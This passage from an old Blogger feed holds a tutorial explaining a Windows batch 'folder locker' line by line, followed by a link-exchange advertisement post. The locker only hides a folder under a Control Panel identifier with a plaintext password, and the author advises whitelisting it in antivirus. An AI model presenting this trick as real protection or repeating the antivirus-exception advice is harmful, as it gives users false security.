Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK &amp;lt;&amp;lt;- tell CMD to go to :UNLOCK &amp;nbsp;path it the folder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" is exist&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;if NOT EXIST Locker goto MDLOCKER &amp;lt;&amp;lt;- tell the CMD to go to :MDLOCKER path if the folder "Locker" does'nt exist&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;:CONFIRM &amp;lt;&amp;lt;- Command path&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;echo Are you sure u want to Lock the folder(Y/N) &amp;lt;&amp;lt;- tell CMD to print out text "Are you sure u want to Lock the folder(Y/N)" on the screen&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;set/p "cho=&amp;gt;" &amp;lt;&amp;lt;- Choice selection&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;if %cho%==Y goto LOCK &amp;lt;&amp;lt;- tell CMD to go to :LOCK path if key Y was pressed&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;if %cho%==y goto LOCK &amp;lt;&amp;lt;- tell CMD to go to :LOCK path if key y was pressed&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;if %cho%==n goto END &amp;lt;&amp;lt;- tell CMD to go to :LOCK path if key n was pressed&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;if %cho%==N goto END &amp;lt;&amp;lt;- tell CMD to go to :LOCK path if key N was pressed&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;echo Invalid choice. &amp;lt;&amp;lt;- &amp;nbsp;tell CMD to print out text "Invalid choice" on the screen&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;goto CONFIRM &amp;lt;&amp;lt;- tell CMD to go to :CONFIRM path&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;:LOCK &amp;lt;&amp;lt;- Command path&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" &amp;lt;&amp;lt;-CMD will rename the "locker" folder to "control panel"&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" &amp;lt;&amp;lt;- CMD will add "system" &amp;amp; "hidden" file attribute to the folder&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;echo Folder locked &amp;lt;&amp;lt;- tell CMD to print out text "Folder locked" on the screen&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;goto End &amp;lt;&amp;lt;- tell the CMD to go to :UNLOCK path&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;:UNLOCK &amp;lt;&amp;lt;-Command path&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;echo Enter password to Unlock folder &amp;lt;&amp;lt;- tell CMD to print out text "Enter password to Unlock folder" on the screen&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;set/p "pass=&amp;gt;" &amp;lt;&amp;lt;- Choice selection&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;if NOT %pass%== password goto FAIL &amp;lt;&amp;lt;-here it is, if the password is not "password", CMD will move to :FAIL path&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" &amp;lt;&amp;lt;- CMD will remove "system" &amp;amp; "hidden" file attribute to the folder&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker &amp;lt;&amp;lt;-CMD will rename the "control panel" folder to "locker"&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;echo Folder Unlocked successfully &amp;lt;&amp;lt;- tell CMD to print out text "Folder Unlocked successfully " on the screen&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;goto End&amp;lt; &amp;lt;- tell CMD to go to :END &amp;nbsp;path&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;:FAIL &amp;lt;&amp;lt;- Command path&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;echo Invalid password &amp;lt;&amp;lt;- tell CMD to print out text "Invalid password" on the screen&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;goto END &amp;lt;&amp;lt;- tell the CMD to go to :ENDpath&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;:MDLOCKER &amp;lt;&amp;lt;- Command path&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;md Locker &amp;lt;&amp;lt;- CDM will create "locker" folder&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;echo Locker created successfully &amp;lt;&amp;lt;- tell CMD to print out text "Locker created successfully" on the screen&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;goto END &amp;lt;&amp;lt;- tell the CMD to go to :END path&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;:END &amp;lt;&amp;lt;- Command path&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;What a long explanation is'nt it.. huh.. I also burn my finger typing these post.. Hehe.. but it's my pleasure to share my knowledge with you all. :)&lt;br /&gt;Ok, By simple explanation, you must change the "password" in &lt;span style="font-weight: bold;"&gt;line 22&lt;/span&gt; to your own password. You can also change the title name in the &lt;span style="font-weight: bold;"&gt;2nd line&lt;/span&gt; to your own. Hope you can find this tutorial useful, and, good luck coders :)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step 3&lt;/span&gt;&lt;br /&gt;Now you can save your file as anyfileneme.bat . You can put any name that you want as long as you keep the extension as *.bat. Now you can put your secret data inside the "locker" folder.&lt;br /&gt;&lt;blockquote&gt;note that AVG will detect these commands as a HackTool. So, Make sure u make an exception list for this file to AVG. This why I hate AVG so much ~ daa&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-6435196300837236360?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/6435196300837236360/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-create-your-own-password.html#comment-form" title="5 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/6435196300837236360" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/6435196300837236360" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-create-your-own-password.html" title="how2.0 : Create Your Own Password Protected Folder" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-6428880505333707739</id><published>2008-09-15T02:18:00.015+08:00</published><updated>2008-09-18T20:19:57.120+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="link exchange" /><title type="text">gcPartner™ ads Link ex-change</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i528.photobucket.com/albums/dd325/zxara_project/ads_default.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://i528.photobucket.com/albums/dd325/zxara_project/ads_default.png" /&gt;&lt;/a&gt;&lt;/div&gt;Want to put your ads in my "&lt;span style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Lucida Grande'; font-size: 13px; white-space: pre;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: red;"&gt;gcPartner™ ads Link ex-change&lt;/span&gt;&lt;/span&gt;" column?&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Lucida Grande'; font-size: 13px; white-space: pre;"&gt;Simply;&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Lucida Grande'; font-size: 13px; font-weight: bold; white-space: pre;"&gt;leave a comment about your site and your url&lt;/span&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Lucida Grande'; font-size: 13px; white-space: pre;"&gt;&lt;span style="font-weight: bold;"&gt;and link me back&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;also&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Lucida Grande'; font-size: 13px; white-space: pre;"&gt;My link codes can be found at the &lt;a href="http://www.gocoders.blogspot.com/"&gt;main page&lt;/a&gt;. Then i'll create a special&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Lucida Grande'; font-size: 13px; white-space: pre;"&gt;link button for you :) Your will be linked to my site as soon as possible&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Lucida Grande'; font-size: 13px; white-space: pre;"&gt;as i've read your comment.Happy blogging to all blogger..&lt;/span&gt;&lt;br /&gt;&lt;span style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Lucida Grande'; font-size: 13px; white-space: pre;"&gt; &lt;/span&gt;&lt;br /&gt;&lt;span style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Lucida Grande'; font-size: 13px; white-space: pre;"&gt;Below is my &lt;span style="color: red; font-weight: bold;"&gt;gcPartner™ ads Link ex-change :&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;center&gt; &lt;br /&gt;&lt;table border="0" style="text-align: center; width: 200px;"&gt;&lt;tbody&gt;&lt;tr&gt;     &lt;td&gt;&lt;a href="http://adamasalahbarunakcari.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/adamasalah-1.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://www.boyzzzzzs.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/boyz.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://vppinkytouch.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/viruspadu-1.png" /&gt;&lt;/a&gt;&lt;/td&gt;   &lt;/tr&gt;&lt;tr&gt;     &lt;td&gt;&lt;a href="http://topotato.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/topotato-1.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://www.shweetpwincess89.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/sweetpwincess.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://luvsal.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/luvsal-1.png" /&gt;&lt;/a&gt;&lt;/td&gt;   &lt;/tr&gt;&lt;tr&gt;     &lt;td&gt;&lt;a href="http://www.kelapa-nyor.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/kelapa.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://jariketot.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/jariketot-1.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://www.topupmalaysia.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/janawanghandphone.png" /&gt;&lt;/a&gt;&lt;/td&gt;   &lt;/tr&gt;&lt;tr&gt;     &lt;td&gt;&lt;a href="http://GETZSOFTWAREZ.CO.CC/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/getzsoftware.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://www.eriyzaqistina.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/eryza.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://dilarang-melarang.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/dilarangmelarang-2.png" /&gt;&lt;/a&gt;&lt;/td&gt;   &lt;/tr&gt;&lt;tr&gt;     &lt;td&gt;&lt;a href="http://www.sukelayan.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/sukelayan-1.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://sukiprattle.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/suki.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://xxshamidaxx.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/chepsmore.png" /&gt;&lt;/a&gt;&lt;/td&gt;   &lt;/tr&gt;&lt;tr&gt;     &lt;td&gt;&lt;a href="http://klikpos.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/klikpos.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://gurlzmystic.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/mistaken.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://www.gocoders.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/ads_default.png" /&gt;&lt;/a&gt;&lt;/td&gt;   &lt;/tr&gt;&lt;tr&gt;     &lt;td&gt;&lt;a href="http://www.gocoders.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/ads_default.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://www.gocoders.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/ads_default.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://www.gocoders.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/ads_default.png" /&gt;&lt;/a&gt;&lt;/td&gt;   &lt;/tr&gt;&lt;tr&gt;     &lt;td&gt;&lt;a href="http://www.gocoders.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/ads_default.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://www.gocoders.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/ads_default.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://www.gocoders.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/ads_default.png" /&gt;&lt;/a&gt;&lt;/td&gt;   &lt;/tr&gt;&lt;tr&gt;     &lt;td&gt;&lt;a href="http://www.gocoders.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/ads_default.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://www.gocoders.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/ads_default.png" /&gt;&lt;/a&gt;&lt;/td&gt;     &lt;td&gt;&lt;a href="http://www.gocoders.blogspot.com/"&gt;&lt;img src="http://i528.photobucket.com/albums/dd325/zxara_project/ads_default.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-6428880505333707739?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/6428880505333707739/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/gcpartner-ads-link-x-change.html#comment-form" title="11 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/6428880505333707739" /><link rel="self" type="application/atom+xml" 